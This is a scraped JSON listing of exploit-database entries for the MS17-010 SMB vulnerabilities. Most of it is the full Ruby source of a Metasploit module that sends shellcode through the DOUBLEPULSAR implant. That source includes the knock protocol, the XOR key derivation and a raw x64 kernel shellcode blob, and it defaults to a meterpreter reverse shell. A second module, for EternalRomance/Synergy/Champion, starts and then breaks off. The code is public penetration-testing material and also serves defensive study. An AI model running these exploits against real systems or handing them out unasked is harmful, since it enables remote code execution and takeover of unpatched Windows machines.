["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", 
"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-14T11:47:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-14T11:47:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 
'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.zdt.ZDTBulletin"]}, {"id": "1337DAY-ID-29702", "hash": "5e42b016f440b4d8256eba859524266c", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows SMB MS17-010 EternalRomance / EternalSynergy / EternalChampion Remote Code Execution", "description": "This Metasploit module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information so that it appears as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "published": "2018-02-03T00:00:00", "modified": "2018-02-03T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/29702", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2018-03-01T23:39:17", "history": [], "viewCount": 81, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-03-01T23:39:17", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96703", "SMNTC-96709"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", 
"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2018-03-01T23:39:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/29702", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Windows XP systems that are not part of a domain default to treating all\r\n# network logons as if they were Guest. This prevents SMB relay attacks from\r\n# gaining administrative access to these systems. This setting can be found\r\n# under:\r\n#\r\n# Local Security Settings >\r\n# Local Policies >\r\n# Security Options >\r\n# Network Access: Sharing and security model for local accounts\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::WbemExec\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\r\n 'Description' => %q{\r\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\r\n primitive. This will then be used to overwrite the connection session information with as an\r\n Administrator session. 
From there, the normal psexec payload code execution is done.\r\n\r\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\r\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\r\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\r\n named pipe.\r\n },\r\n 'Author' =>\r\n [\r\n 'sleepya', # zzz_exploit idea and offsets\r\n 'zerosum0x0',\r\n 'Shadow Brokers',\r\n 'Equation Group'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10,\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'References' =>\r\n [\r\n [ 'AKA', 'ETERNALSYNERGY' ],\r\n [ 'AKA', 'ETERNALROMANCE' ],\r\n [ 'AKA', 'ETERNALCHAMPION' ],\r\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\r\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\r\n [ 'CVE', '2017-0147'], # for EternalRomance reference\r\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\r\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\r\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 3072,\r\n 'DisableNops' => true\r\n 